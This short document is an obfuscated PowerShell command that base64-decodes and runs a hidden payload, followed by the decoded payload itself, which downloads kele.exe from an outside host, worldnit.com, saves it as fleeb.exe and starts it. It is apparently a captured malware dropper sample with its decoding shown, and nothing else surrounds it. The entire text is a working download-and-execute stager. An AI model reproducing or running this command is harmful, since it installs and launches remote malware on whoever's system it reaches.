iex([syStem.tEXt.EnCoDiNG]::Utf8.GETstring([SySTEM.COnVeRt]::fromBASE64STRing('CihOZXctT2JqZWN0IFN5U3RFTS5OZXQuV0ViY2xpZU50KS5kT3dOTE9BREZpTEUoJ2h0dHA6Ly93b3JsZG5pdC5jb20va2VsZS5leGUnLCdmbGVlYi5leGUnKTtTdGFydC1Qcm9jZXNzICdmbGVlYi5leGUnCgo=')));exit

##### B64 CONTENT #####


(New-Object SyStEM.Net.WEbclieNt).dOwNLOADFiLE('http://worldnit.com/kele.exe','fleeb.exe');Start-Process 'fleeb.exe'

